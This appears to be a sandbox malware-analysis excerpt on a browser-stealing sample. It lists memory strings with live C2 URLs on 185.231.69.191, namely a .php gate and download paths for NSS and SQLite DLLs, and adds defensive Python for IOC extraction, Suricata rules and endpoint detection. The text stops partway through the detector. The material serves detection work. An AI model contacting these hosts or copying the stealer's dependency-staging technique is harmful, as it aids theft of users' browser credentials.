Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001551000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/nss3.dllv
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/softokn3.dll
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/softokn3.dll/f
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/softokn3.dllkg
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.000000000156E000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/sqlite3.dll
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/vcruntime140.dll
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/vcruntime140.dll$a/
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.php
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.php)
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.php-minuser-l1-1-0
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.php2L
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.000000000156E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpEcF
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpF
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.0000000001586000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpJj
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpP
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpata
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpbL
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpcation
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpdll
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phperbird
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpf
Source: gYjK72gL17.exe, 00000000.00000003.2442011468.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpft
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpirefox
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpme
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpnL
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001586000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phprowser
Source: gYjK72gL17.exe, 00000000.00000002.2607101722.0000000001566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phpzL
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000244000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.231.69.191ata
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: http://185.231.69.191f190e2808a5419c3.php59aef09ac94adad262762b7dcff87lt-release
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: gYjK72gL17.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: gYjK72gL17.exe String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: gYjK72gL17.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: gYjK72gL17.exe String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: gYjK72gL17.exe String found in binary or memory: http://ocsp.sectigo.com0
Source: chromecache_86.5.dr String found in binary or memory: http://www.broofa.com
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: gYjK72gL17.exe, gYjK72gL17.exe, 00000000.00000002.2613874448.000000006C9FD000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: gYjK72gL17.exe, 00000000.00000002.2607785860.0000000003B71000.00000004.00000020.00020000.00000000.sdmp, gYjK72gL17.exe, 00000000.00000002.2613733639.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chromecache_86.5.dr String found in binary or memory: https://apis.google.com
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chromecache_86.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
Source: chromecache_86.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
Source: chromecache_86.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
Source: chromecache_86.5.dr String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
Source: JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: chromecache_86.5.dr String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
Source: gYjK72gL17.exe String found in binary or memory: https://sectigo.com/CPS0
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://support.mozilla.org
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: gYjK72gL17.exe, 00000000.00000003.2304373058.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_86.5.dr String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_86.5.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_86.5.dr String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org#
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/W1sYnpxLnB3ZA==
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: gYjK72gL17.exe, 00000000.00000002.2605632956.0000000000327000.00000004.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: HDBGDHDAECBGDHJKFIDGCBFBKF.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: gYjK72gL17.exe, 00000000.00000002.2610669943.0000000009C91000.00000004.00000020.00020000.00000000.sdmp, JJKEBGHJKFIDGCAAFCAF.0.dr String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
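The memory-string findings above repeat the same two URL shapes many times with heap debris glued to the end (".dllkg", ".php-minuser-l1-1-0", "$a/"), and two copies have lost their path separator altogether. The Python below is an added triage helper, not part of this Joe Sandbox report, that reduces those lines to a de-duplicated IOC set (the .php gate, the per-build dependency directory and the DLL names) and emits Suricata http.uri rules from it. The input list is copied from the report with the Source prefix trimmed; the rule text, sids and the assumption that the gate and dependency paths are the only URL shapes worth keeping are mine.

```python
import re

# Memory-string findings copied from the report above (Source prefix trimmed).
# Whatever follows ".php" / ".dll" ("kg", "$a/", "-minuser-l1-1-0", ...) is
# adjacent heap data swept up by the string scan, not part of the URL.
REPORT_LINES = [
    "String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/softokn3.dll/f",
    "String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/softokn3.dllkg",
    "String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/sqlite3.dll",
    "String found in binary or memory: http://185.231.69.191/ec05bb5a9eb90166/vcruntime140.dll$a/",
    "String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.php",
    "String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.php-minuser-l1-1-0",
    "String found in binary or memory: http://185.231.69.191/f190e2808a5419c3.phperbird",
    # fragmentary copies with no path separator: these must be dropped, not repaired
    "String found in binary or memory: http://185.231.69.191ata",
    "String found in binary or memory: http://185.231.69.191f190e2808a5419c3.php59aef09ac94adad262762b7dcff87lt-release",
    # certificate-chain URL embedded in the legitimate NSS DLLs: not an IOC
    "String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0",
]

# The gate is a .php script and the Firefox-decryption dependencies are .dll
# files under a per-build directory. The non-greedy path stops at the first
# such extension, which is what strips the trailing heap debris.
URL_RE = re.compile(r"(https?)://([A-Za-z0-9.-]+)(/[A-Za-z0-9_./-]*?\.(?:php|dll))")
IPV4_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def extract_iocs(lines):
    """Return de-duplicated gate URLs, dependency names and download directories."""
    hosts, gates, dep_dirs, deps = set(), set(), set(), set()
    for line in lines:
        for scheme, host, path in URL_RE.findall(line):
            hosts.add(host)
            directory, name = path.rsplit("/", 1)
            if name.endswith(".php"):
                gates.add(f"{scheme}://{host}{path}")
            else:
                dep_dirs.add(directory + "/")
                deps.add(name)
    return {
        "hosts": sorted(hosts),
        "ip_literal_hosts": sorted(h for h in hosts if IPV4_RE.match(h)),
        "gates": sorted(gates),
        "dependency_dirs": sorted(dep_dirs),
        "dependencies": sorted(deps),
    }


def suricata_rules(iocs, base_sid=9000000):
    """One http.uri rule per gate and per dependency directory (sids are placeholders)."""
    contents = [("gate request", g.split("://", 1)[1].split("/", 1)[1]) for g in iocs["gates"]]
    contents += [("dependency download", d.lstrip("/")) for d in iocs["dependency_dirs"]]
    rules = []
    for i, (label, uri) in enumerate(contents):
        rules.append(
            f'alert http $HOME_NET any -> $EXTERNAL_NET any '
            f'(msg:"Stealc/Vidar {label}"; flow:established,to_server; '
            f'http.uri; content:"/{uri}"; sid:{base_sid + i}; rev:1;)'
        )
    return rules


if __name__ == "__main__":
    iocs = extract_iocs(REPORT_LINES)
    for key, values in iocs.items():
        print(f"{key}: {values}")
    print("\n".join(suricata_rules(iocs)))
```

Matching on the dependency directory rather than on individual DLL names keeps the rule useful if the operator adds or renames a dependency; the hex build directory and the .php gate name are what tie the traffic to this C2 deployment.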
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49989 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49780 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49810 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49908 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.198.118.190:443 -> 192.168.2.6:49989 version: TLS 1.2
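The string sources above show the sample carrying dropped copies of freebl3.dll, softokn3.dll, nss3.dll and mozglue.dll (the `.0.dr` entries) and fetching softokn3.dll, sqlite3.dll and vcruntime140.dll from the C2 over plain HTTP to an IP-literal host. On an endpoint that combination is unusual for anything but a browser installer, so it makes a workable behavioural detection independent of the specific hash or IP. The Python below is an added example and not part of the report: it correlates constructed Sysmon-style file-create and network events per process and alerts when a non-allowlisted image drops two or more of these DLLs, raising severity when the same process also pulled a .dll or hit a .php gate on an IP-literal host. The event records, the drop directory and the ALLOWED_WRITERS list are assumptions for the example, not telemetry from this analysis.

```python
import re
from collections import defaultdict

# Dependency DLLs the report shows being fetched from the C2 and dropped
# (the freebl3/softokn3/nss3/mozglue/sqlite3/vcruntime140 names above).
NSS_DEPENDENCIES = {"nss3.dll", "mozglue.dll", "softokn3.dll", "freebl3.dll",
                    "sqlite3.dll", "vcruntime140.dll"}
# Assumed allowlist of images that legitimately write these files; extend it
# with your own installer and updater images.
ALLOWED_WRITERS = {"firefox.exe", "thunderbird.exe", "updater.exe", "maintenanceservice.exe"}
IP_LITERAL_URL = re.compile(r"^https?://\d{1,3}(?:\.\d{1,3}){3}/")

# Constructed Sysmon-style events (not from the report): one process staging
# the stealer's dependencies and talking to an IP-literal host, plus two
# benign writers that must not alert. The drop directory is an assumption.
SAMPLE = r"C:\Users\user\Desktop\gYjK72gL17.exe"
EVENTS = [
    {"event": "file_create", "pid": 4242, "image": SAMPLE, "target": r"C:\ProgramData\nss3.dll"},
    {"event": "file_create", "pid": 4242, "image": SAMPLE, "target": r"C:\ProgramData\mozglue.dll"},
    {"event": "file_create", "pid": 4242, "image": SAMPLE, "target": r"C:\ProgramData\softokn3.dll"},
    {"event": "file_create", "pid": 4242, "image": SAMPLE, "target": r"C:\ProgramData\freebl3.dll"},
    {"event": "network", "pid": 4242, "image": SAMPLE, "url": "http://185.231.69.191/ec05bb5a9eb90166/softokn3.dll"},
    {"event": "network", "pid": 4242, "image": SAMPLE, "url": "http://185.231.69.191/f190e2808a5419c3.php"},
    # Firefox's updater refreshing its own NSS copies: allowlisted image
    {"event": "file_create", "pid": 777, "image": r"C:\Program Files\Mozilla Firefox\updater.exe",
     "target": r"C:\Program Files\Mozilla Firefox\nss3.dll"},
    {"event": "file_create", "pid": 777, "image": r"C:\Program Files\Mozilla Firefox\updater.exe",
     "target": r"C:\Program Files\Mozilla Firefox\mozglue.dll"},
    # an installer dropping a single VC runtime: below the threshold on its own
    {"event": "file_create", "pid": 900, "image": r"C:\Windows\System32\msiexec.exe",
     "target": r"C:\Program Files\SomeApp\vcruntime140.dll"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_nss_staging(events, min_dlls=2):
    """Alert on a non-allowlisted process that drops >= min_dlls NSS/SQLite
    dependencies; severity is 'high' when the same process also fetched a
    .dll or contacted a .php gate on an IP-literal host, else 'medium'."""
    state = defaultdict(lambda: {"image": "", "dlls": set(), "dll_urls": set(), "gates": set()})
    for ev in events:
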